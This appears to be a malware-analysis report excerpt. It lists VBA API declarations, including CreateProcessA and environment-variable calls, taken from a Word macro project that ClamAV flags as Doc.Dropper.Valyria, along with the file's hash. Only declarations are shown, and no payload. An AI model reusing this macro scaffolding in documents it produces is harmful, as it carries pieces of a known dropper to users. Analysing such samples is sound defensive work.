Public Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Public Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As Long, ByVal dwMilliseconds As Long) As Long

Public Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As Long


Public Declare Function SetEnvironmentVariable Lib "kernel32" Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As Long
Public Declare Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Sub GetStartupInfoA Lib "kernel32" (lpStartupInfo As STARTUPINFO)
Public Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long
Public Declare Function SelectObject Lib "gdi32" (ByVal hDC As Long, ByVal hObject As Long) As Long
Public Declare Function StretchBlt Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal dwRop As Long) As Long
Public Declare Function GetStretchBltMode Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function SetStretchBltMode Lib "gdi32" (ByVal hDC As Long, ByVal nStretchMode As Long) As Long
#End If
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 78848 bytes
SHA-256: ae8f40a5a1092b75fbd51243a5e937558feb3254db79a8e06683c92fc463a563
Detection
ClamAV: Doc.Dropper.Valyria-8011744-0
Obfuscation or payload: unlikely